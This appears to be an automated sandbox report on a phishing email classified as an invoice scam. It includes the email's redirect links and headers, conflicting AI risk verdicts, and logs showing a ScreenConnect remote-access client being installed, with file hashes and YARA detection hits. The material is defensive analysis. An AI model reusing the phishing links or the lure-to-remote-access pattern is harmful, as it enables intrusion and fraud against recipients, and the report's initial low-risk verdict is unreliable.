<https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.zi5jYUxwJ-2B9g-2BhxDwu5-2Fkvfd7bbSAHKuVjmml4JtHch75zvI3AduhX4mF-2Brg0jOnOn2I5XU5or9ZaebSEGgvKw-3D-3DKDth_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBOrUVvGMl-2FXLzauFQtT0YawPD8TPivKOxi-2B1fZDCX4T3uMjpMiaojbnCYTMz05cFxrQLlNYce8LzT8QxukiKkCMcy1gt4BU9s-2FsBZ6Zobc1Atsbo7BkpCji4v-2FRGzw2noMwiDIjegSOz-2B1-2FIlHQhsSh&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=3676b21f3ef86fe8dedba98dd7d7ae22ebda4b11> \t\n/p>\n\n <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.J8Wm48ULAAoyNaFSLnBTkBm4sicnBWaW9HD5lj5GfNZ3QWvFVe-2B0-2BsUngdr8JkMlsJNHkNzXpBmRCAq5b7U3Y33aAIF9ggEFFEWP7a9hnNw-3D7yhA_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNOdvMy0NAKf6w06dOD4HyRi87WaaWRXCJ8-2FPIZidN8MQwVZk6hDa7IHXiXpupRbauYYDic9g7PNeX2R2AXRZQzAtcLEZxFA1Qzh80eppmWw20EZKTGXmrjH57lUr9E6ZOk492UStIbUnW-2FCM6aefdw&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=1c12c42022b3da2fb1fe558d24e616710485f92f> \t <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.WSOZBAs3f8-2Fr7dgg-2BW6eyWFsuGZzDVnTr57ADPNZe-2FQjuj-2BhGK7F59uSPoZpjqdo9yheb6-2Bhj5KZlr2hUdrhrQBHowbcNrU9HA7h6j2meHHlfPLNZZN6NDYapPMEIfMwH6AD5-2F1D2xOC3jZYDTFeOEgM-2BS1Dt50nCB8NJCfVxm2SsFVDJnW8oQ1UIJ-2F-2F-2FclErHdv2gtOF6omsZLOwcnndw-3D-3D201e_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBMVNvlAruzDNoVGFuiM71uan5dkaeLqUJU8-2BFY6RDDVaCv1Nldwl5c3FwaexObNcUktRzywIFrlPjOGSY21vtaL2shZlvixlA1hDslubJk041pg4ctQIj1wFky82rYFtVq7T4YHf8zGTlTO6sxWCSO6&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=eb533936ec2b24219e63b98e8c27668b3214c046> \t \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nDisclaimer: We have reviewed the contract for insurance purposes only. We are not in a position to provide legal advice, and thus our review is based on coverage in force at the time of the review. The comments made in this review are not intended to be a substitute for a review of the contract by your companys legal counsel and accordingly, it is recommended that your counsel review this contract. We disclaim any and all liabilities arising from this review and any final contract language. As governed by insurance law in all states, a Certificate of Insurance cannot extend or alter coverage provided in an insurance policy in any way. Policy rights and conditions can only be extended through the policies and endorsements. To comply with state regulations and ACORD standards, our company policy is to provide copies of the actual forms contained within the evidenced policies to those that request them. Along these lines, what is stated in the Description of Operations is solely and strictly based on information provided to this agency by the named insured.\n\nhttps://clicktime.cloud.postoffice.net/clicktime.php?U=https://scenvironmental.samanage.com/activate/eyJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImNoZXJ5bEBzY2Vudmlyb25tZW50YWwuY2EiLCJhY2NvdW50IjpudWxsLCJleHBpcmVkIjoiMjAyNC0xMS0wOSAwMDozOTo0MSBVVEMifQ._ZQP-byL-c3t1ArY7HeMzKmTxR1K-dUoXlrjHqecX0o&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=dc52b503f0a0af8f13bcd3011c97d468b89ee35b <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.HF-2F4tkZ5BkdRwB973UOuNU83PyGZPZGgev8MG9MROkYKLlzq6dYbFIQ0Wp6-2FVOqitUz4KJ44JaY7-2FJ6x9a1NuuQI4gtcFBkpNfqIyb2tcmk3ghcwPyH4xxczxqNh07TBcw2bN0NpkqQ1FtrEfJeo-2FDBichJe82LIWW0kQL2M-2F6AxWMpBDawaaL0hUuLzPsRop3rAwy1WquPKYsXp-2FMTckqEHWNsYnqbuTAWWorwRfjiQ7-2FeiNiMIMv0AdJgg3b3Vz6Atlo6US0kEMREAFWZiAQHn7BrHXnCJFC7Rb8IWwXHTxXMBIPCDL8Ug9Nwn74Vyb94U_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBPIwOHq4vI-2FpxeP-2FlP-2BoxMVFBgMnFDdV1PmPLpD8DuYSF4JnPAa1rcDKd7Jij2Q7Py3pz8YsYwOcrJBJbUx14AIxTjLJuhHjyzPZialD5u-2FRjfG9GqhGW-2B2yeXEQfZ0QxfYUOdBsLrCB9QoQfj2PHni&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=b86cbb914efff989efa37569dcdd9425495ebfa9> \n" ], "from": "Daniel Wintner <danielw@thearbagroup.com>", "to": "Daniel Wintner <danielw@thearbagroup.com>", "attachements": [] }
URL: email Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": [ "Email passes through legitimate Microsoft Exchange infrastructure", "SCL (Spam Confidence Level) is -1, indicating trusted sender", "BCL (Bulk Complaint Level) is 0, suggesting legitimate business email", "Message originates from known mail server (postin03.mbox.net)", "Headers contain consistent domain alignment between return-path and message-id", "X-Forefront-Antispam-Report shows US origin with no suspicious patterns", "Contains extensive Microsoft security headers indicating proper routing", "No authentication failures or suspicious routing patterns detected" ] }
Date: Thu, 16 Jan 2025 04:57:06 -0800 Key: mime-version Value: 1.0 Key: return-path Value: danielw@thearbagroup.com Key: x-microsoft-antispam-message-info Value: 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 Key: message-id Value: <c016ba7cd192416db98e6a9ed2a05826@thearbagroup.com> Key: received Value: Fri, 17 Jan 2025 09:15:52 -0800 Key: x-ms-exchange-crosstenant-authas Value: Anonymous Key: x-ms-exchange-crosstenant-originalarrivaltime Value: 17 Jan 2025 17:15:45.2299 (UTC) Key: content-type Value: Multipart/alternative; charset="windows-1252"; boundary="00B0FEED_message_boundary" Key: x-forefront-antispam-report Value: CIP:165.212.64.87;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:postin03.mbox.net;PTR:postin03.mbox.net;CAT:NONE;SFS:(13230040)(82310400026)(5073199012)(12012899012)(5063199012)(8096899003);DIR:INB; Key: x-originating-ip Value: [40.90.192.170] Key: x-ms-exchange-organization-scl Value: -1 Key: x-microsoft-antispam Value: BCL:0;ARA:13230040\|82310400026\|5073199012\|12012899012\|5063199012\|8096899003;
URL: Email Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your eDocument is ready.", "prominent_button_name": "Review Document", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "file hosting" }

URL: Email Model: Joe Sandbox AI	{ "brands": [ "Twitter", "Facebook", "LinkedIn" ] }
	{ "brands": [ "Twitter", "Facebook", "LinkedIn" ] }
URL: Email Model: Joe Sandbox AI	{"classification":"Invoice Scam"}
Email: Detected potential phishing email: The email contains multiple suspicious redirect links through clicktime.cloud.postoffice.net pointing to potentially malicious domains. The subject line and content follow common phishing patterns mentioning 'remittance' and 'eDocument' to create urgency. The sender's domain doesn't match the service desk contact information and social media links included in the footer	{"classification":"Invoice Scam"}

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\49dfbe.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE21F.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE23F.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE483.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\49dfc0.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\49dfc0.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\33xjpkwm.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\33xjpkwm.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\kg0yg1f5.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\kg0yg1f5.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\43c40lnf.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\43c40lnf.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\txen3epo.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\txen3epo.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\oz1n5u5s.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\oz1n5u5s.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\fgz2mhtp.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\fgz2mhtp.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\gmfovyxq.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\gmfovyxq.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\yaccxh23.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\yaccxh23.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\di3gogkl.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\di3gogkl.newcfg

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	219728
Entropy (8bit):	6.581081686214598
Encrypted:	false
SSDEEP:
MD5:	474167A6EDB2BE6B084920ED3F3613EC
SHA1:	753D7ADE74841D3CD1D108CD9D0C04B3EE3ACE36
SHA-256:	A1349F05B4C147A64F9CAAA91A265183BE0233156D144108A8425B5B2EF8E772
SHA-512:	6B0DA069BBB914B4A39C6FDB4CBD8FAF16136266B6281EBE29E0BC17E3B2DD146E1A99C06B15AAC8F155BF16191A6741E5E02F4586ED442F1E021AFE98411D9D
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security
Reputation:	unknown
Preview:	...@IXOS.@.....@.e1Z.@.....@.....@.....@.....@.....@......&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E29000A5-D988-BF34-ACFB-64A448AB1544}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{8E57D407-5D27-BB2E-53F9-13C161E29BDA}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{CE2EDB79-B248-8637-FD32-785C13A46331}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{0BF493B6-0475-E8DC-7971-F55AFBC83A92}&.{8FE752F3-A90B-15F1-EEA9

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:	dropped
Size (bytes):	1088392
Entropy (8bit):	7.789940577622617
Encrypted:	false
SSDEEP:
MD5:	8A8767F589EA2F2C7496B63D8CCC2552
SHA1:	CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
SHA-256:	0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
SHA-512:	518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..\|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	4.977464602412109
Encrypted:	false
SSDEEP:
MD5:	6F52EBEA639FD7CEFCA18D9E5272463E
SHA1:	B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
SHA-256:	7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
SHA-512:	B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 17 16:45:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9875590019920053
Encrypted:	false
SSDEEP:
MD5:	A003BA36CC7A0DFAF30DB53EFEB0BA28
SHA1:	2FDCC7E95396C5E9B4638EAEF2CF252FB2E837F6
SHA-256:	29FFCFA997148960B9079FC19868F170F83BE95E8F2D3FA5DF28552124DF4332
SHA-512:	32B813E80AE944556CF104C13BACEAA57C956850694E154E5B4065EA5E665D0B51F8033C459CD46FC233DDDE1A2D8786241F60838EB196197439F2CECF3EACC0
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........i..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4926
Entropy (8bit):	3.2482637276968966
Encrypted:	false
SSDEEP:
MD5:	EA0734C2443099AEA731044D975FC7BE
SHA1:	41D5A44A6B6764A75BF07A4147A27B27379FF143
SHA-256:	EB8A7562533B63EF84515A78E1620670F348F8A26BEEC0F2B2ED04497BD4333D
SHA-512:	4416610DCB8AE6335A3D014414FB6ACDCA13CA0A7F520FE05650494D62CD4A111ED1A1E10471F48774A63A2080AAE4AA8D4FB6129D2F90446DC3C67028E5D7F6
Malicious:	false
Reputation:	unknown
